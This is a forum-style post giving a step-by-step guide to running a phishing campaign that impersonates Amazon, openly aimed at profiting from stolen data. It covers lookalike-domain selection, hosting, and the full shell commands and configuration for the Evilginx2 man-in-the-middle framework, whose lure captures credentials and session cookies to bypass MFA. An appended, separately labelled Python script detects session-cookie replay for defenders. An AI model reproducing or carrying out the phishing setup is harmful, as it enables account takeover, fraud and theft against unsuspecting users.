colbyburgess
Hello, I'm going to start by saying that this can either:
A. Make you a lot of money, or
B. Depending on what you do with the stolen data, you could face jail time.
Step 1: Get a server.
The first step in any phishing campaign is to get a cheap VPS to host your page. There are numerous providers out there. Choose Debian as your operating system; it will work best for this.
Step 2: Register a phishing domain.
To find out what some phishing domains are, I recommend installing dnstwist on a Kali machine and running the domain of the site you're attacking through it to see what's available. I recommend buying your domain from Namecheap because they have reasonable prices and will not ban it quickly, which is always a plus.
Step 3 (time to type): Install Evilginx2
First and foremost, Evilginx2 is a MiTM phishing framework that also steals session cookies, which can be used to circumvent MFA.
To install this, run the following:
sudo apt update
sudo apt install wget -y
wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install
sudo evilginx
Step 4: Create a Page.
After running, you will see a list of pages that are all disabled; choose your page of choice, but first we need to configure Evilginx so that we don't have problems.
Configure domain: <yourdomain>
Configure IP <yourIP>
blacklist unauth
The blacklist command is used to protect your site from scanners. You want to do this.
Next, choose your preferred phishlet (phishing page).
Phishlets hostname: Amazon <your domain name>.
Phishlets enable Amazon.
Now it's time to set up our lure for this website. This is the actual phishing page.
Create Amazon lures and edit the redirect URL to https://amazon.com.
Lures get-url 0
After running lures get-url 0, you should see a link appear on the screen, which is your phishing URL.
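Added example, not part of the original post: the post says a stolen session cookie can be used to circumvent MFA, so a defender's check is to flag any session ID that later appears with a different client fingerprint than it had before. The log format, field names and sample rows are constructed for illustration, and the (ASN, user agent) fingerprint is an assumption about what the service records.

```python
import csv
import io

# Constructed sample log (not from the post):
# time, session id, user, source IP, source ASN, user agent
SAMPLE_LOG = """\
2024-02-16T10:00:05Z,sess-a1,alice,203.0.113.10,AS64500,Firefox/122.0 Windows
2024-02-16T10:00:40Z,sess-b2,bob,198.51.100.7,AS64501,Safari/17.2 macOS
2024-02-16T10:03:12Z,sess-b2,bob,198.51.100.99,AS64501,Safari/17.2 macOS
2024-02-16T10:04:51Z,sess-a1,alice,192.0.2.55,AS64511,Chrome/121.0 Linux
2024-02-16T10:05:02Z,sess-a1,alice,192.0.2.55,AS64511,Chrome/121.0 Linux
"""


def find_replayed_sessions(log_text):
    """Flag requests where a known session ID arrives with a new fingerprint.

    The fingerprint is (ASN, user agent) rather than the raw IP, so an
    address change inside one network (sess-b2 above) is not reported.
    Each new fingerprint is reported once per session.
    """
    seen = {}       # session id -> set of fingerprints already observed
    findings = []
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 6:
            continue  # skip blank or malformed lines
        ts, sid, user, ip, asn, agent = row
        fingerprint = (asn, agent)
        known = seen.setdefault(sid, set())
        if known and fingerprint not in known:
            findings.append({"time": ts, "session": sid, "user": user,
                             "ip": ip, "asn": asn, "agent": agent})
        known.add(fingerprint)
    return findings


if __name__ == "__main__":
    for f in find_replayed_sessions(SAMPLE_LOG):
        print(f"{f['time']} session {f['session']} ({f['user']}) "
              f"reused from {f['ip']} {f['asn']} {f['agent']}")
```

A finding is a reason to revoke the session and require re-authentication; binding the session to the client at issuance, or using phishing-resistant authenticators such as FIDO2/WebAuthn, addresses the same risk at the source.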